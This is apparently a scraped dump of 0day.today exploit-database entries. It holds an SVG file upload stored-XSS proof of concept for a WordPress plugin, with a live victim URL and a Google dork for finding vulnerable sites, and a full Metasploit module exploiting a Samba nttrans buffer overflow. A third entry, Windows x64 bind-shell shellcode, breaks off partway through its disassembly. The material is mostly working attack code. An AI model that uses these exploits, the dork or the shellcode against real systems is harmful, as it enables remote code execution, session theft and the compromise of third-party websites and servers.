-24 23 -28z\"/>\r\n <path d=\"M420 2497 l0 -114 30 -1 30 -1 0 115 0 114 -30 0 -30 0 0 -113z m31 -24 c2 -23 0 -45 -4 -49 -4 -4 -7 17 -7 46 0 62 7 64 11 3z\"/>\r\n <path d=\"M2527 2498 l2 -112 86 -3 85 -3 0 115 0 115 -87 0 -88 0 2 -112z m73 88 c0 -3 -4 -8 -10 -11 -5 -3 -10 -1 -10 4 0 6 5 11 10 11 6 0 10 -2 10 -4z m-30 -15 c0 -6 -4 -12 -8 -15 -5 -3 -9 1 -9 9 0 8 4 15 9 15 4 0 8 -4 8 -9z m108 -18 c2 -12 -1 -30 -7 -40 -8 -14 -9 -8 -4 21 4 27 3 37 -5 32 -6 -3 -14 -1 -17 5 -5 7 0 10 11 7 11 -2 20 -13 22 -25z m-38 -58 l0 -65 -30 0 -30 0 1 65 c2 65 2 65 30 65 29 0 29 0 29 -65z m35 -66 c-4 -11 -15 -19 -26 -19 -11 0 -17 5 -14 10 3 6 13 10 20 10 11 0 13 9 9 33 -4 29 -4 30 6 8 6 -13 8 -32 5 -42z m-106 -7 c1 -7 -3 -10 -9 -7 -5 3 -10 18 -9 33 0 24 1 25 9 7 5 -11 9 -26 9 -33z\"/>\r\n <path d=\"M2800 2495 l0 -115 30 0 30 0 0 115 0 115 -30 0 -30 0 0 -115z m40 -31 c0 -34 -4 -53 -10 -49 -5 3 -10 28 -10 56 0 27 5 49 10 49 6 0 10 -25 10 -56z\"/>\r\n <path d=\"M123 2140 l-1 -110 29 0 29 0 0 94 c0 52 3 101 6 110 5 13 -1 16 -27 16 l-34 0 -2 -110z\"/>\r\n <path d=\"M285 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m147 68 c-2 -10 -6 -18 -8 -18 -2 0 -8 8 -13 18 -7 14 -6 18 8 18 12 0 17 -6 13 -18z m-32 -71 l0 -64 -30 5 c-29 4 -30 5 -30 63 0 59 0 59 30 59 l30 0 0 -63z m37 -27 c4 -48 3 -59 -8 -55 -10 4 -13 21 -11 66 5 74 13 70 19 -11z m-114 -4 c2 -16 12 -35 23 -43 18 -14 18 -14 -6 -11 -27 3 -39 28 -32 66 6 28 10 25 15 -12z\"/>\r\n <path d=\"M2510 2140 l0 -110 28 0 27 0 0 110 0 110 -27 0 -28 0 0 -110z m27 -42 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z\"/>\r\n <path d=\"M2685 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m135 73 c0 -14 -2 -15 -9 -4 -6 10 -20 12 -45 8 -20 -3 -36 -2 -36 2 0 4 20 8 45 10 38 2 45 -1 45 -16z m-20 -73 c0 -60 0 -60 -30 -60 -30 0 -30 0 -30 60 0 60 0 60 30 60 30 0 30 0 30 -60z m40 44 c0 -8 -5 -12 -10 -9 -6 4 -8 11 -5 16 9 14 15 11 15 -7z m-104 -119 c13 -9 12 -11 -5 -11 -19 0 -21 6 -19 56 1 53 2 53 5 11 3 -25 11 -50 19 -56z m91 73 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m13 -43 c0 -25 -32 -50 -53 -41 -7 2 -4 5 6 5 11 1 20 12 24 31 7 36 23 40 23 5z\"/>\r\n <path d=\"M124 1750 l1 -110 88 0 87 0 0 110 0 110 -88 0 -89 0 1 -110z m37 53 c-9 -16 -10 -14 -11 12 0 21 3 26 11 18 8 -8 8 -16 0 -30z m93 21 c5 -14 4 -15 -9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-14 -77 c0 -62 0 -63 -27 -61 -27 1 -28 3 -31 62 l-3 62 31 0 30 0 0 -63z m37 11 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m-13 -85 c-17 -17 -18 -17 -11 0 4 10 7 24 7 30 0 8 3 8 11 0 9 -9 7 -16 -7 -30z m-94 2 c10 -12 10 -15 -4 -15 -9 0 -16 7 -16 15 0 8 2 15 4 15 2 0 9 -7 16 -15z\"/>\r\n <path d=\"M420 1750 l0 -110 30 0 30 0 0 110 0 110 -30 0 -30 0 0 -110z\"/>\r\n <path d=\"M2525 1750 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m45 66 c0 -23 -16 -27 -17 -5 -1 10 2 19 8 19 5 0 9 -6 9 -14z m101 -3 c5 -97 5 -134 -2 -145 -5 -8 -9 17 -9 59 0 39 -3 78 -6 87 -3 9 -1 16 5 16 6 0 11 -8 12 -17z m-29 -72 c2 -52 0 -67 -9 -60 -6 6 -20 9 -30 7 -16 -3 -18 5 -21 60 l-3 62 30 0 29 0 4 -69z m-85 -23 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m20 -44 c2 -6 -3 -11 -12 -11 -8 0 -15 7 -15 15 0 15 22 12 27 -4z\"/>\r\n <path d=\"M2800 1751 c0 -108 0 -109 25 -113 13 -3 27 -3 30 0 3 3 5 54 5 114 l0 108 -30 0 -30 0 0 -109z m40 -11 c0 -33 -4 -60 -9 -60 -9 0 -14 98 -5 112 11 17 14 6 14 -52z\"/>\r\n <path d=\"M641 1634 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z\"/>\r\n <path d=\"M129 1507 c0 -1 -1 -53 -2 -115 l-2 -112 28 0 27 0 0 105 c0 58 1 108 3 111 1 4 -10 8 -25 10 -16 1 -28 2 -29 1z m28 -99 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z\"/>\r\n <path d=\"M290 1505 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111 -83 1 c-45 1 -82 2 -82 2z m142 -47 c5 -76 3 -144 -7 -150 -16 -12 -35 -9 -32 5 1 7 -10 13 -26 15 -28 3 -28 4 -25 65 3 59 4 62 31 64 l27 2 0 -70 c0 -44 4 -69 11 -69 8 0 10 26 7 80 -2 44 0 80 4 80 5 0 9 -10 10 -22z m-109 -3 c-3 -9 -8 -14 -10 -11 -3 3 -2 9 2 15 9 16 15 13 8 -4z m10 -144 c10 -11 9 -13 -3 -9 -17 5 -28 59 -20 103 4 22 6 16 8 -25 2 -30 9 -61 15 -69z\"/>\r\n <path d=\"M2510 1505 c0 0 -1 -51 -3 -113 l-2 -112 30 0 31 0 -2 112 -3 111 -25 2 c-14 0 -26 1 -26 0z m32 -102 c-5 -83 -9 -90 -11 -20 0 37 2 67 7 67 4 0 6 -21 4 -47z\"/>\r\n <path d=\"M2689 1500 c0 -3 -1 -53 -2 -112 l-2 -108 88 0 88 0 -3 111 -3 111\r\n -83 1 c-45 1 -82 0 -83 -3z m42 -43 c-6 -6 -11 -35 -11 -64 0 -29 -3 -53 -7\r\n -53 -8 0 -6 104 2 128 3 7 10 10 16 7 8 -5 8 -10 0 -18z m93 7 c5 -14 4 -15\r\n -9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-21 -16 c-2 -5 -3 -33 -3 -63 0\r\n -54 0 -55 -30 -55 -30 0 -30 0 -30 58 0 32 2 61 5 63 7 8 60 5 58 -3z m37 -74\r\n c0 -41 -4 -63 -10 -59 -5 3 -10 1 -10 -4 0 -6 -7 -11 -17 -11 -15 0 -15 1 0\r\n 18 11 12 17 36 17 70 0 29 5 52 10 52 6 0 10 -29 10 -66z m-103 -70 c-9 -9\r\n -28 6 -21 18 4 6 10 6 17 -1 6 -6 8 -13 4 -17z\"/>\r\n <path d=\"M2080 1459 c0 -5 5 -7 10 -4 6 3 10 8 10 11 0 2 -4 4 -10 4 -5 0 -10\r\n -5 -10 -11z\"/>\r\n <path d=\"M129 1110 c-1 -3 -2 -53 -3 -112 l-1 -108 87 0 88 0 0 113 0 112 -85\r\n 0 c-47 0 -86 -2 -86 -5z m42 -34 c-5 -6 -11 -29 -14 -51 -4 -34 -4 -33 -4 11\r\n 0 35 4 51 14 51 8 0 9 -4 4 -11z m98 -3 c0 -11 -3 -13 -6 -5 -11 28 -23 -3\r\n -23 -64 l0 -64 -30 0 -31 0 3 63 c3 58 5 62 26 60 13 -2 25 4 28 12 8 21 34\r\n 19 33 -2z m8 -55 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z m0 -50\r\n c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-107 -41 c0 -18 -2 -19\r\n -10 -7 -13 20 -13 43 0 35 6 -3 10 -16 10 -28z m103 3 c-3 -12 -8 -19 -11 -16\r\n -5 6 5 36 12 36 2 0 2 -9 -1 -20z\"/>\r\n <path d=\"M420 1004 l0 -114 30 0 30 0 0 113 0 114 -30 1 -30 1 0 -115z\"/>\r\n <path d=\"M600 1115 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111\r\n -83 1 c-45 1 -82 2 -82 2z m42 -43 c-7 -2 -12 -16 -13 -30 0 -15 -3 -21 -6\r\n -14 -8 21 6 64 19 56 9 -6 9 -9 0 -12z m95 3 c0 -8 -4 -12 -9 -9 -4 3 -8 9 -8\r\n 15 0 5 4 9 8 9 5 0 9 -7 9 -15z m-27 -70 l0 -65 -30 0 c-30 0 -30 0 -30 58 0\r\n 65 3 72 37 72 22 0 23 -4 23 -65z m-48 -85 c23 -9 23 -9 -3 -9 -27 -1 -40 15\r\n -38 47 0 12 3 10 9 -6 5 -12 20 -27 32 -32z m88 6 c0 -17 -2 -18 -10 -6 -7 11\r\n -10 11 -10 2 0 -7 -4 -11 -10 -7 -13 8 -2 32 15 32 9 0 15 -10 15 -21z\"/>\r\n <path d=\"M884 1111 c-2 -2 -4 -53 -4 -113 l0 -108 33 0 32 0 -3 114 -3 114\r\n -25 -2 c-14 0 -28 -3 -30 -5z m23 -53 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7\r\n 2 -19 0 -25z m13 -78 c0 -5 -4 -10 -10 -10 -5 0 -10 5 -10 10 0 6 5 10 10 10\r\n 6 0 10 -4 10 -10z\"/>\r\n <path d=\"M2020 1111 c-24 -5 -34 -11 -32 -21 2 -8 1 -12 -3 -8 -4 4 -25 -3\r\n -46 -14 -38 -20 -39 -21 -39 -77 0 -31 -3 -66 -6 -78 -6 -23 -5 -23 85 -23\r\n l91 0 0 115 c0 63 -3 114 -7 114 -5 -1 -24 -5 -43 -8z m29 -58 c-1 -17 -3 -21\r\n -6 -10 -2 9 -9 17 -14 17 -5 0 -9 5 -9 10 0 6 7 10 15 10 10 0 15 -9 14 -27z\r\n m-39 -48 l0 -65 -30 0 c-30 0 -30 0 -30 58 0 65 3 72 37 72 22 0 23 -4 23 -65z\r\n m-83 30 c0 -8 -4 -15 -9 -15 -10 0 -11 14 -1 23 9 10 10 9 10 -8z m16 -92 c4\r\n -19 2 -33 -3 -33 -6 0 -10 1 -10 3 -10 64 -10 81 -2 72 5 -5 12 -25 15 -42z\r\n m101 15 c-4 -13 -7 -29 -7 -35 0 -7 -6 -13 -12 -13 -9 0 -9 9 -1 35 6 19 15\r\n 35 19 35 5 0 5 -10 1 -22z\"/>\r\n <path d=\"M2210 1003 l0 -113 88 0 87 0 0 111 0 110 -88 2 -87 2 0 -112z m59\r\n 75 c6 -7 22 -13 34 -13 20 0 22 -6 25 -62 l3 -63 -31 0 -30 0 0 59 c0 36 -5\r\n 63 -13 69 -20 17 -10 -118 11 -140 9 -11 11 -18 4 -18 -19 0 -30 33 -32 100\r\n -1 36 -2 68 -1 73 2 11 15 9 30 -5z m90 -53 c-1 -77 -11 -110 -32 -111 -10 -1\r\n -12 0 -3 3 27 8 36 131 11 157 -14 13 -13 15 5 13 18 -1 20 -8 19 -62z\"/>\r\n <path d=\"M2530 1115 c0 0 -1 -51 -3 -113 l-2 -112 88 0 87 0 0 113 0 112 -85\r\n 0 c-47 0 -85 0 -85 0z m33 -67 c-7 -59 -13 -61 -13 -5 0 26 4 47 9 47 4 0 6\r\n -19 4 -42z m110 21 c-4 -15 -8 -17 -14 -8 -8 14 -3 29 11 29 4 0 6 -9 3 -21z\r\n m-33 -66 c0 -63 0 -63 -29 -63 -28 0 -29 1 -30 57 0 67 1 69 33 69 25 0 26 -2\r\n 26 -63z m34 -21 c-2 -67 -3 -72 -15 -72 -5 0 -7 5 -3 12 4 6 6 29 6 51 -2 33\r\n 3 57 11 57 1 0 1 -21 1 -48z\"/>\r\n <path d=\"M2800 1003 l0 -113 30 0 30 0 0 113 0 114 -30 0 -30 0 0 -114z m39\r\n 10 c-1 -67 -2 -67 -10 -23 -11 63 -11 90 1 90 6 0 9 -28 9 -67z\"/>\r\n <path d=\"M1870 1080 c-66 -23 -63 -23 -54 -8 4 7 3 8 -5 4 -6 -4 -9 -11 -6\r\n -15 7 -13 -65 -58 -112 -70 -23 -7 -67 -25 -98 -41 -58 -31 -95 -38 -95 -19 0\r\n 5 -4 8 -9 5 -5 -4 -22 -1 -38 5 -15 6 -40 12 -55 14 -15 2 -38 11 -52 20 -27\r\n 18 -98 33 -81 17 6 -5 36 -19 67 -32 32 -12 55 -26 52 -31 -3 -5 1 -6 9 -3 8\r\n 3 42 -4 75 -15 74 -25 109 -27 114 -5 2 9 37 30 87 50 47 19 85 33 86 31 1 -1\r\n -2 -15 -6 -32 -4 -16 -7 -22 -8 -12 -2 31 -26 13 -29 -21 -3 -30 -1 -32 27\r\n -32 31 0 31 0 32 58 l0 57 70 35 c39 19 75 41 81 47 13 16 14 16 -52 -7z\"/>\r\n <path d=\"M1180 770 c0 -5 5 -10 11 -10 5 0 7 5 4 10 -3 6 -8 10 -11 10 -2 0\r\n -4 -4 -4 -10z\"/>\r\n <path d=\"M150 634 c0 -74 4 -113 10 -109 6 3 10 26 10 50 0 44 0 44 33 39 46\r\n -7 97 26 97 63 0 50 -33 73 -104 73 l-46 0 0 -116z m111 86 c26 -14 24 -55 -3\r\n -74 -12 -9 -37 -16 -55 -16 -33 0 -33 0 -33 50 l0 50 36 0 c19 0 44 -5 55 -10z\"/>\r\n <path d=\"M562 638 c2 -69 7 -112 13 -110 6 1 10 24 10 50 0 44 2 47 24 44 13\r\n -2 44 -26 69 -53 24 -27 48 -46 53 -43 5 3 -11 26 -36 52 l-44 46 29 12 c44\r\n 19 51 61 16 91 -21 18 -39 23 -82 23 l-54 0 2 -112z m122 76 c21 -20 20 -30\r\n -4 -54 -13 -13 -33 -20 -60 -20 l-40 0 0 45 0 45 44 0 c27 0 51 -6 60 -16z\"/>\r\n <path d=\"M1023 729 c-57 -36 -67 -123 -20 -166 53 -49 105 -56 158 -20 44 29\r\n 62 81 47 131 -22 70 -118 98 -185 55z m142 -25 c38 -41 31 -116 -14 -151 -29\r\n -22 -95 -16 -125 12 -36 34 -37 105 -1 140 35 36 106 35 140 -1z\"/>\r\n <path d=\"M1521 658 c-1 -50 -7 -98 -13 -105 -6 -7 -26 -13 -45 -13 -20 0 -32\r\n -4 -28 -10 10 -17 60 -11 82 10 13 11 24 38 28 62 8 58 2 141 -12 145 -7 3\r\n -11 -27 -12 -89z\"/>\r\n <path d=\"M1830 645 c0 -58 -1 -108 -2 -112 -2 -5 32 -9 75 -11 48 -2 77 1 77\r\n 8 0 6 -27 10 -65 10 l-65 0 0 45 0 45 55 0 c30 0 55 5 55 10 0 6 -25 10 -55\r\n 10 l-55 0 0 40 0 40 65 0 c37 0 65 4 65 10 0 6 -32 10 -75 10 l-75 0 0 -105z\"/>\r\n <path d=\"M2278 734 c-32 -17 -58 -62 -58 -100 0 -61 59 -114 127 -114 29 0 83\r\n 26 83 40 0 15 -16 12 -30 -5 -15 -18 -82 -20 -112 -4 -11 6 -26 26 -34 46 -30\r\n 72 12 133 92 133 23 0 46 -4 49 -10 7 -12 35 -13 35 -2 0 30 -107 41 -152 16z\"/>\r\n <path d=\"M2660 740 c0 -5 21 -10 46 -10 l45 0 -2 -102 c-1 -69 2 -103 10 -106\r\n 8 -3 11 28 11 102 l0 106 45 0 c25 0 45 5 45 10 0 6 -40 10 -100 10 -60 0\r\n -100 -4 -100 -10z\"/>\r\n <path d=\"M481 504 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z\"/>\r\n <path d=\"M2805 381 c-24 -5 -35 -17 -57 -59 l-27 -53 -27 55 c-25 52 -30 56\r\n -62 56 l-34 0 48 -67 c40 -56 48 -75 49 -113 0 -43 1 -45 30 -45 29 0 30 1 27\r\n 43 -3 37 2 50 47 112 28 38 47 71 43 73 -4 2 -20 1 -37 -2z m-78 -163 c-3 -8\r\n -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M157 268 l2 -113 28 0 28 1 3 112 3 112 -33 0 -33 0 2 -112z\"/>\r\n <path d=\"M340 266 l0 -113 25 0 c24 0 25 2 25 62 0 43 -5 66 -15 75 -18 15\r\n -16 57 2 57 15 0 17 -13 3 -22 -5 -3 -7 -12 -3 -21 3 -8 8 -13 10 -10 3 2 27\r\n -21 55 -52 70 -79 70 -79 96 -87 22 -6 22 -6 22 109 l0 116 -25 0 c-24 0 -25\r\n -2 -25 -64 0 -53 3 -65 18 -69 14 -4 14 -5 -3 -6 -13 0 -41 24 -80 68 -40 46\r\n -68 70 -82 70 -23 1 -23 -1 -23 -113z m65 54 c-3 -5 -12 -10 -18 -10 -7 0 -6\r\n 4 3 10 19 12 23 12 15 0z m115 -115 c0 -8 -2 -15 -4 -15 -2 0 -6 7 -10 15 -3\r\n 8 -1 15 4 15 6 0 10 -7 10 -15z\"/>\r\n <path d=\"M696 355 c-30 -27 -29 -26 -17 -58 7 -17 25 -30 60 -43 54 -19 64\r\n -36 31 -54 -15 -8 -27 -7 -49 4 -26 14 -30 14 -45 -3 -15 -17 -14 -19 24 -36\r\n 52 -23 104 -12 134 28 19 26 19 30 6 54 -9 15 -33 32 -60 42 -27 10 -46 24\r\n -48 35 -3 15 3 17 49 14 43 -2 54 0 57 13 3 19 -24 29 -79 29 -25 0 -45 -8\r\n -63 -25z\"/>\r\n <path d=\"M950 268 l0 -113 82 2 c77 1 83 3 86 24 4 21 1 22 -52 16 l-56 -6 0\r\n 30 c0 28 2 29 44 29 40 0 44 2 39 21 -5 18 -11 19 -44 14 -38 -7 -39 -6 -39\r\n 24 0 31 0 31 55 31 48 0 55 2 55 20 0 18 -7 20 -85 20 l-85 0 0 -112z m37 60\r\n c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m9 -56 c-4 -26 -21 -24\r\n -22 2 -1 16 3 23 11 20 7 -3 12 -13 11 -22z\"/>\r\n <path d=\"M1260 365 c-46 -25 -67 -92 -44 -141 29 -61 103 -87 167 -60 60 24\r\n 44 54 -19 37 -68 -19 -115 29 -94 95 13 38 32 46 99 42 28 -2 45 1 48 9 11 30\r\n -110 44 -157 18z\"/>\r\n <path d=\"M1522 289 c3 -82 5 -92 28 -109 36 -28 83 -33 126 -15 55 23 63 39\r\n 64 133 l0 82 -30 0 -30 0 0 -78 c0 -85 -8 -102 -50 -102 -42 0 -50 17 -50 102\r\n l0 78 -31 0 -31 0 4 -91z m188 -69 c-6 -11 -13 -20 -16 -20 -2 0 0 9 6 20 6\r\n 11 13 20 16 20 2 0 0 -9 -6 -20z\"/>\r\n <path d=\"M1860 267 l0 -114 31 0 c30 0 31 1 27 44 -3 35 0 43 14 43 10 0 27\r\n -17 40 -39 17 -31 30 -40 57 -45 19 -3 37 -3 40 -1 2 3 -15 27 -37 54 -39 46\r\n -40 50 -22 56 26 8 40 36 33 64 -8 32 -54 51 -123 51 l-60 0 0 -113z m125 63\r\n c12 -20 -6 -47 -38 -57 l-32 -10 3 39 c4 34 7 38 32 38 16 0 32 -5 35 -10z\r\n m32 -12 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-120 -70 c-3\r\n -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M2160 266 l0 -113 30 1 30 1 0 113 0 112 -30 0 -30 0 0 -114z m37\r\n -38 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M2320 360 c0 -17 7 -20 40 -20 l40 0 0 -93 0 -94 30 0 30 0 0 94 0\r\n 93 35 0 c28 0 35 4 35 20 0 19 -7 20 -105 20 -98 0 -105 -1 -105 -20z m110\r\n -35 c0 -5 -5 -3 -10 5 -5 8 -10 20 -10 25 0 6 5 3 10 -5 5 -8 10 -19 10 -25z\r\n m8 -56 c-3 -20 -5 -19 -9 9 -3 20 -2 29 4 23 5 -5 7 -19 5 -32z\"/>\r\n <path d=\"M818 123 c7 -3 16 -2 19 1 4 3 -2 6 -13 5 -11 0 -14 -3 -6 -6z\"/>\r\n </g>\r\n <script type=\"text/javascript\">\r\n alert(\"@insecurity\");\r\n </script>\r\n</svg>\r\n\r\n-------------------------------------------------------------------------------------------------------------\r\n\r\nHere is a live example: \r\n https://www.saltsidecreations.com/wp-content/uploads/fancy_products_uploads/2017/04/28/insecurity.svg\r\n\r\nThis could have a variety of impacts ranging from stealing cookies and regular XSS-related risks to a highly\r\neffective spear phishing campaign\r\n\r\nGoogle Dork: inurl:fancy_products_uploads\r\n\r\n-------------------------------------------------------------------------------------------------------------\r\n\r\nHow to fix: Use whitelist for file upload (e.g. only allow JPG and PNG, no .svg)\r\n\r\nThere's also multiple full path disclosure for this plugin but WP is riddled with FPD. If you're interested then \r\nget in touch (although im pretty sure there's tons of files in /wp-includes/ that will give you FPD anyway presuming no error_reporting(0) set)\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27710"}, {"lastseen": "2018-03-13T14:08:32", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "reporter": "metasploit", "published": "2017-03-23T00:00:00", "title": "Samba 2.2.2 < 2.2.6 - nttrans Buffer Overflow Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-13T14:08:32", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:C/", "value": 6.1}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1318"], "modified": "2017-03-23T00:00:00", "id": "1337DAY-ID-27398", "href": "https://0day.today/exploit/description/27398", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = AverageRanking\r\n \r\n include Msf::Exploit::Remote::SMB::Client\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',\r\n 'Description' => %q{\r\n This module attempts to exploit a buffer overflow vulnerability present in\r\n versions 2.2.2 through 2.2.6 of Samba.\r\n The Samba developers report this as:\r\n \"Bug in the length checking for encrypted password change requests from clients.\"\r\n The bug was discovered and reported by the Debian Samba Maintainers.\r\n },\r\n 'Author' => [ 'hdm' ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2002-1318' ],\r\n [ 'OSVDB', '14525' ],\r\n [ 'BID', '6210' ],\r\n [ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'linux',\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\",\r\n 'MinNops' => 512,\r\n },\r\n 'Targets' =>\r\n [\r\n [ \"Samba 2.2.x Linux x86\",\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux',\r\n 'Rets' => [0x01020304, 0x41424344],\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Apr 7 2003'\r\n ))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(139)\r\n ], self.class)\r\n end\r\n \r\n def exploit\r\n \r\n # 0x081fc968\r\n \r\n pattern = Rex::Text.pattern_create(12000)\r\n \r\n pattern[532, 4] = [0x81b847c].pack('V')\r\n pattern[836, payload.encoded.length] = payload.encoded\r\n \r\n # 0x081b8138\r\n \r\n connect\r\n smb_login\r\n \r\n targ_address = 0xfffbb7d0\r\n \r\n #\r\n # Send a NTTrans request with ParameterCountTotal set to the buffer length\r\n #\r\n \r\n subcommand = 1\r\n param = ''\r\n body = ''\r\n setup_count = 0\r\n setup_data = ''\r\n data = param + body\r\n \r\n pkt = CONST::SMB_NTTRANS_PKT.make_struct\r\n self.simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n \r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n \r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0x2001\r\n pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count\r\n \r\n pkt['Payload'].v['ParamCountTotal'] =12000\r\n pkt['Payload'].v['DataCountTotal'] = body.length\r\n pkt['Payload'].v['ParamCountMax'] = 1024\r\n pkt['Payload'].v['DataCountMax'] = 65504\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Subcommand'] = subcommand\r\n \r\n pkt['Payload'].v['Payload'] = data\r\n \r\n self.simple.client.smb_send(pkt.to_s)\r\n ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)\r\n \r\n #\r\n # Send a NTTrans secondary request with the magic displacement\r\n #\r\n \r\n param = pattern\r\n body = ''\r\n data = param + body\r\n \r\n pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct\r\n self.simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n \r\n base_offset = pkt.to_s.length - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n \r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0x2001\r\n pkt['Payload']['SMB'].v['WordCount'] = 18\r\n \r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.length\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['ParamDisplace'] = targ_address\r\n pkt['Payload'].v['DataCount'] = body.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n \r\n pkt['Payload'].v['Payload'] = data\r\n \r\n self.simple.client.smb_send(pkt.to_s)\r\n ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)\r\n \r\n \r\n handler\r\n \r\n end\r\n \r\nend\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/27398"}, {"lastseen": "2018-01-05T17:21:05", "references": [], "description": "Exploit for win64 platform in category shellcode", "edition": 1, "reporter": "Roziul Hasan Khan Shifat", "published": "2017-01-01T00:00:00", "title": "Windows/x64 - Password Protected Bind Shellcode (825 bytes)", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-05T17:21:05", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/", "value": 3.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-01-01T00:00:00", "id": "1337DAY-ID-26603", "href": "https://0day.today/exploit/description/26603", "sourceData": "/*\r\n \r\n # Title : Windows x64 Password Protected Bind Shell TCP shellcode\r\n # size : 825 bytes\r\n # Author : Roziul Hasan Khan Shifat\r\n # Tested On : Windows 7 x64 professional\r\n # Date : 01-01-2017 \r\n \r\n*/\r\n \r\n \r\n \r\n/*\r\n \r\n \r\n file format pe-x86-64\r\n \r\n \r\nDisassembly of section .text:\r\n \r\n0000000000000000 <_start>:\r\n 0: 99 cltd \r\n 1: b2 80 mov $0x80,%dl\r\n 3: 48 29 d4 sub %rdx,%rsp\r\n 6: 4c 8d 24 24 lea (%rsp),%r12\r\n a: 48 31 d2 xor %rdx,%rdx\r\n d: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax\r\n 12: 48 8b 40 18 mov 0x18(%rax),%rax\r\n 16: 48 8b 70 10 mov 0x10(%rax),%rsi\r\n 1a: 48 ad lods %ds:(%rsi),%rax\r\n 1c: 48 8b 30 mov (%rax),%rsi\r\n 1f: 48 8b 7e 30 mov 0x30(%rsi),%rdi\r\n 23: b2 88 mov $0x88,%dl\r\n 25: 8b 5f 3c mov 0x3c(%rdi),%ebx\r\n 28: 48 01 fb add %rdi,%rbx\r\n 2b: 8b 1c 13 mov (%rbx,%rdx,1),%ebx\r\n 2e: 48 01 fb add %rdi,%rbx\r\n 31: 8b 73 1c mov 0x1c(%rbx),%esi\r\n 34: 48 01 fe add %rdi,%rsi\r\n 37: 48 31 d2 xor %rdx,%rdx\r\n 3a: 41 c7 04 24 77 73 32 movl $0x5f327377,(%r12)\r\n 41: 5f \r\n 42: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12)\r\n 49: 32 \r\n 4a: 41 88 54 24 